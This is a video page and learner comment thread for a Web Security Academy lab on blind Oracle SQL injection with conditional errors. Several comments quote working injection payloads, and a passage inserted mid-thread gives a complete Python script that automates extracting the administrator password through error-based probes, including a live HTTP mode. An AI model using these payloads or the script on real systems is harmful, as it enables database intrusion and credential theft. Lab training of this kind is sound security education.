SQL Injection - Lab #12 - Blind SQL injection with conditional errors

  • Published: 28 Sep 2024
  • In this video, we cover Lab #12 in the SQL injection track of the Web Security Academy. This lab contains a blind SQL injection vulnerability. To solve the lab, we perform a blind SQL injection attack against the database that retrieves the password of the administrator user of the application.
    ▬ ✨ Support Me ✨ ▬▬▬▬▬▬▬▬▬▬
    Buy my course: academy.ranakh...
    ▬ Links ▬▬▬▬▬▬▬▬▬▬
    Long video: • SQL Injection - Lab #1...
    SQL injection Lab #11 video (previous video): • SQL Injection - Lab #1...
    SQL Injection | Complete Guide (theory video): • SQL Injection | Comple...
    Notes.txt document: github.com/rkh...
    Web Security Academy Video Release Schedule: docs.google.co...
    Web Security Academy: portswigger.ne...
    Rana's Twitter account: / rana__khalil

Comments • 55

  • @RanaKhalil101  3 years ago +2

    Interested in supporting me and gaining early access to the Web Security Academy videos when they're recorded? Consider buying my course: academy.ranakhalil.com/p/web-security-academy-video-series! ✨ ✨

  • @RanaKhalil101  3 years ago +29

    After recording the video, I realized the SQL payload can be much simpler. We don't need a CASE expression in order for it to work. The following is the alternative payload:
    ' || (select TO_CHAR(1/0) FROM users WHERE username='administrator' and SUBSTR(password,1,1)='a')|| '

    • @ahmedsaleem9327 2 years ago +3

      Great video. Can we use AND instead of concatenation? I am unable to understand why we haven't used AND.

    • @mileke0 1 year ago

      @@ahmedsaleem9327 Yes. AND works as well.

    • @vinigreen 1 month ago +1

      How does this ' || (select TO_CHAR(1/0) FROM users WHERE username='administrator' and SUBSTR(password,1,1)='a')|| ' work exactly?
      I mean, I think that if the SUBSTR is true then you will select the 1/0 and get the error message, which is what we want.
      But in the case where SUBSTR(password,1,1) is not 'a', the clause is false, which also leads to an error, right?
      So how does this work?

  • @Zephyr-tg9hu 2 years ago +11

    Noticed that there were a couple of people who were wondering why the solution for this lab uses concatenation:
    Doesn't matter what technique you use, this lab simply introduces a new technique that uses string concatenation instead of an equality check. You could just as easily do this lab using previous techniques.
    Eg.
    Instead of:
    '||(SELECT CASE WHEN (1=2) THEN to_char(1/0) ELSE '' END FROM dual)||'
    We could have:
    ' AND (SELECT CASE WHEN (1=2) THEN to_char(1/0) ELSE '' END FROM dual)=''--
    Concatenation simply leads to a simpler solution in this case, so it is quicker to use.

    • @anirudhsaxena9214 1 year ago

      ||(select+username+from+users+where+username%3d'administrator')|| this statement doesn't give an internal error; that means administrator exists in the table, right?

    • @user-h8m 1 year ago

      @@anirudhsaxena9214 I guess the purpose here is to get an error; if you do not get it, the condition is true and it passes to the second part of the condition --> ' ' = blank.
      It means that everything is alright and the administrator user does not exist.

    • @alla-turca 9 months ago

      Could we use the same payload as in the previous video instead of trying to do 1/0 or the CASE keyword? For example, we did "and (select username from users where username = 'administrator') = 'administrator'--". Wouldn't this work here as well? If not, why?

  • @mahmoudchiboub8213 3 years ago +9

    Hi, can you please tell me why we needed to use the concatenation operator in this case,
    and why we didn't use the comment operator to ignore the apostrophe?

    • @MohammedAhmed-id1ry 2 years ago +1

      You can do it with AND, it will hardly make a difference; it's just another technique.

  • @marcschweiz 2 years ago +1

    Great stuff Rana. I bought your course to support you! Thank you for your time on these videos...

  • @x7331x 9 months ago

    Amazing explanation of why the query for finding if the admin user exists works. Keep it up 👆 !

  • @iluzdd 1 year ago

    Great work, your videos are really helpful.
    I just didn't understand why you decided to concatenate? Is this an obvious move for Blind SQLi?

  • @lollocanzo5633 9 months ago

    Hey, I have a question. Since in this case it's an Oracle database and I don't know the syntax, after having found the parameter vulnerable to injection, and having made sure it was vulnerable by seeing whether it interpreted what was passed as a query, I handed everything to sqlmap, obviously specifying the injection point. Is this a good approach in your opinion?

  • @starchild_3693 3 years ago

    Salamu Alaykoum Rana, how are you?
    What an amazing walkthrough, you make it look so easy!
    Unbelievable skills.
    Thank you by the way.
    Do you recommend learning SQL?
    I don't have much SQL Knowledge.
    Thank you again.

  • @user-h8m 1 year ago

    I barely understood the logic of this kind of SQL injection in Oracle... but what I would like to know is whether the same error triggering exists for SQL database?

  • @Abhishekn._ 3 years ago

    Nice explanations, waiting for the rest of the videos too.

  • @mohdaadilf 1 year ago

    Here's a very peculiar error:
    '|| (select CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END FROM users where username = 'administrator' and LENGTH(password)>100) ||--
    Using comments at the end together with the concatenation doesn't work. However, what does work is using comments without the concatenation string:
    ' || (select CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END FROM users where username = 'administrator' and LENGTH(password)>100) --
    Anyone know why that is?

  • @brunuusamadio 2 years ago

    Thanks, amazing video!!

  • @anirudhsaxena9214 1 year ago

    Can someone explain to me the significance of ' ' rather than ', please? I am confused by that.

    • @user-h8m 1 year ago

      I guess the ' ' means that everything is ok and it does not display any message if the first condition is true..
      So it returns HTTP 200.

  • @siddhant50 3 years ago

    Great!

  • @melantheoszimurri9981 7 months ago

    Why are you using solutions that go more in line with what the labs are teaching? There's no way a beginner is going to know all of these different commands you are using.

  • @BigHeadEddie 2 years ago +2

    I did the lab before this one called "Blind SQL injection with conditional responses". I didn't have to concatenate in that lab. I am not sure why concatenation was necessary in this lab. Can you explain?

  • @nvssairam5754 3 years ago +3

    Why can't we follow the same steps here that we follow in Blind SQLi with conditional responses? Because the difference between conditional errors and conditional responses is that there, if true we get the WELCOME message, else NO MESSAGE, but here, if true NO ERROR, else ERROR. TYIA

  • @mih4743 10 months ago +1

    Excellent video.
    My eWPT cert is in 4 weeks, so I can't thank you enough for your videos and the effort you put into the quality educational content you put out.
    The method I found I'm able to learn with, even though it is tedious (the method, not the content), allows retention for those struggling with the information sticking, because this stuff is hard lol, but you've done us a great service:
    Method:
    1. Solo Attempt
    2. Watch Video ( as a lecture )
    3. Re-Attempt ( still without video )
    4. Complete with Video ( side by side )
    5. 3rd Attempt (without the video )

  • @shamanwolf1335 3 months ago

    I had a hard time understanding why we still get an error while 1=1 and we have a user called administrator. Then you explained how SQL queries work and bingo! I instantly understood! Thank you so much!!

  • @PeterCoder02 5 months ago

    Hi, Ms. Khalil. Can you help me figure out the difference between conditional response and conditional errors in SQL Injection, please? This confused me. Thanks.

  • @thinhdang9256 1 year ago

    Can someone explain to me why this challenge doesn't use -- at the end of the statement like the other challenges?

  • @adilhashmi7608 4 months ago

    We can perform this attack using the ffuf tool.

  • @nishanahmed5318 3 years ago +1

    Eagerly waited for your walkthrough

  • @nadir2k 3 years ago +1

    did you just reupload this?

    • @RanaKhalil101  3 years ago +1

      Nope. This is the short version that will be linked to from the official Web Security Academy website.

  • @zzzzzzzzZzZZzzzaZzz 1 year ago

    How do I know the type of database?

  • @hackerninjaking2617 1 year ago

    it took me three days to solve this lab😅😅😅

  • @moizbutt119 8 months ago +1

    Why can't we use AND statements in this scenario too? The previous lab was pretty similar to this, so why can't we use AND statements?
    Thanks

  • @eladbruchim2148 2 years ago

    Hey Rana, Thanks for that amazing video explanation!
    Can you please explain how the function of 'TO_CHAR' is manifested on the query?

  • @vaibhavsuri2389 1 year ago

    Hi Rana
    Thanks for sharing such helpful videos, but I need your help with this challenge.
    I am using the queries below to find the password length:
    ' || (select CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END FROM users where username = 'administrator' and LENGTH(password)>1) ||
    ' || (select CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END FROM users where username = 'administrator' and LENGTH(password)>50) ||
    In both cases I am getting a 500 response.
    I am following the same steps that you did in this video; can you please help me with this issue?

    • @mohdaadilf 1 year ago +1

      Have you closed the query? From what you've posted, the syntax is wrong. You have an open quote mark but haven't closed it. Either add a single quote, or comment out after the length function without the concatenation:
      ' || (select CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END FROM users where username = 'administrator' and LENGTH(password)>1) || '
      or
      ' || (select CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END FROM users where username = 'administrator' and LENGTH(password)>1) --

    • @milosmarkovic4566 1 year ago

      Just add ' at the end of the query.

  • @7Arunkumar 1 year ago

    Hi @Rana Khalil, I did watch your basic video. In the previous video we used conditional responses and now we are using a different technique; can we use the old method as well?

  • @wahid_cyril9244 2 years ago

    How do you exploit a MySQL database? Please make a video on exploiting a MySQL database 🙏

  • @melisaozen4897 7 months ago

    Perfect, love your detailed explanations! Thank you ☺ 🙏

  • @acronproject 1 year ago

    Thanks for this Ms.Khalil

  • @masicre9574 2 years ago

    It would be really helpful if you could make a video to get a clear idea of DOM XSS.

  • @vuongnguyenminh9584 2 years ago

    Thank you so much for these videos, they are easy to understand and learn!

  • @0xPr3d4T0r 2 years ago

    Underrated channel👏

  • @feritkardal 2 years ago

    08:30 I didn't understand why it doesn't work without rownum and why we used rownum=1.

    • @ZoMbiE4CoBRA 11 months ago

      Because the query returns ' ' for every row in the users table, the result of the subquery will look like this, for example, if there are 3 users:
      rownum | 
      1      | ' '
      2      | ' '
      3      | ' '
      It is important to note that by ' ' I mean the ' ' in the select statement (select ' ' from users).
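The thread above covers the whole procedure in pieces: Rana's simplified `TO_CHAR(1/0)` payload, Zephyr's point that `||` concatenation and `AND ... = ''--` are interchangeable, and the `rownum=1` subtlety in the reply just above. The script below is an added example (it is not code from the video, the lab or the course) that strings those payloads together and extracts the administrator password automatically, the way the ffuf suggestion in the thread would. The HTTP details are assumptions about the lab (`TrackingId` cookie on `/filter`, HTTP 500 on a database error, URL-encoding the cookie value as Burp does); `FakeLab` is a constructed stand-in with a made-up users table so the script runs offline, and it only recognises the payload shapes built here rather than parsing SQL.

```python
"""Blind SQL injection with conditional errors (Oracle), automated end to end."""
import re
import string
from typing import Callable
from urllib.parse import quote

# Lab passwords are lowercase letters and digits; widen this for other targets.
ALPHABET = string.ascii_lowercase + string.digits

# payload -> True when the server answered with a database error (HTTP 500).
Oracle = Callable[[str], bool]


# --- payload builders ---------------------------------------------------------
# Each payload is spliced into the existing single-quoted literal with ||, so the
# outer query stays syntactically valid and the only error the database can raise
# is the divide-by-zero we trigger on purpose inside CASE. The same probes could
# be written as ' AND (...)='' -- as the thread notes; the || form is shorter.

def wrap(condition: str) -> str:
    """Error iff `condition` holds for the administrator row."""
    return ("'||(SELECT CASE WHEN (" + condition + ") THEN TO_CHAR(1/0) ELSE '' END"
            " FROM users WHERE username='administrator')||'")


def length_gt(n: int) -> str:
    return wrap(f"LENGTH(password)>{n}")


def char_is(pos: int, ch: str) -> str:
    return wrap(f"SUBSTR(password,{pos},1)='{ch}'")


# Probe that the users table exists before naming a row. rownum=1 is what makes
# it answerable: without it a multi-row table returns several rows from a scalar
# subquery and Oracle raises ORA-01427, so "table exists" and "table missing"
# would both look like an error.
TABLE_EXISTS = "'||(SELECT '' FROM users WHERE rownum=1)||'"


# --- extraction ---------------------------------------------------------------

def find_length(oracle: Oracle, max_len: int = 64) -> int:
    """Binary-search the length with LENGTH(password)>n probes: the probe is true
    for every n below the length and false from the length up, so the first n at
    which it turns false is the length itself (assumes length <= max_len)."""
    lo, hi = 0, max_len
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(length_gt(mid)):
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract_password(oracle: Oracle) -> str:
    """Recover the administrator password one position at a time."""
    if oracle(TABLE_EXISTS):
        raise RuntimeError("users table not reachable (error on the rownum=1 probe)")
    out = []
    for pos in range(1, find_length(oracle) + 1):
        for ch in ALPHABET:
            if oracle(char_is(pos, ch)):
                out.append(ch)
                break
        else:
            raise RuntimeError(f"no character in ALPHABET matched at position {pos}")
    return "".join(out)


# --- constructed stand-in for the lab, so the script runs offline -------------
class FakeLab:
    """oracle() is True exactly when the real app would return HTTP 500.
    Pattern-matches the payload shapes above; the users table is made up."""

    def __init__(self, admin_password: str):
        self.users = {"administrator": admin_password, "wiener": "peter"}
        self.requests = 0

    def oracle(self, payload: str) -> bool:
        self.requests += 1
        if payload == TABLE_EXISTS:
            return False  # table exists and rownum=1 keeps the subquery single-row
        pw = self.users["administrator"]
        m = re.search(r"LENGTH\(password\)>(\d+)", payload)
        if m:
            return len(pw) > int(m.group(1))
        m = re.search(r"SUBSTR\(password,(\d+),1\)='(.)'", payload)
        if m:
            pos, ch = int(m.group(1)), m.group(2)
            return pos <= len(pw) and pw[pos - 1] == ch
        raise ValueError("payload shape not modelled: " + payload)


def http_oracle(lab_url: str, payload: str) -> bool:
    """Oracle against a live instance (assumed: TrackingId cookie on /filter,
    HTTP 500 on a database error). Needs the third-party `requests` package."""
    import requests
    r = requests.get(lab_url + "/filter?category=Gifts",
                     cookies={"TrackingId": quote(payload, safe="")}, timeout=10)
    return r.status_code == 500


if __name__ == "__main__":
    lab = FakeLab("s3cr3tpassw0rd")  # constructed secret, 14 characters
    print(extract_password(lab.oracle), "recovered in", lab.requests, "requests")
    # Live lab (URL is a placeholder):
    # extract_password(lambda p: http_oracle("https://YOUR-LAB-ID.web-security-academy.net", p))
```

Each position costs at most 36 requests with this alphabet and the length search costs about six, so the offline run above finishes in a few hundred oracle calls; against the real lab, swap `lab.oracle` for `http_oracle` and expect the same request count, which is also a useful number to keep in mind when writing detection for this pattern (many near-identical requests differing only in a `SUBSTR(...)` position and one character).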

  • @padaloni 3 years ago

    Great video. It's really refreshing listening to a female voice in pentesting videos. So much nicer on the ears :) Also, your explanations are on point and simple to understand. Keep it up :)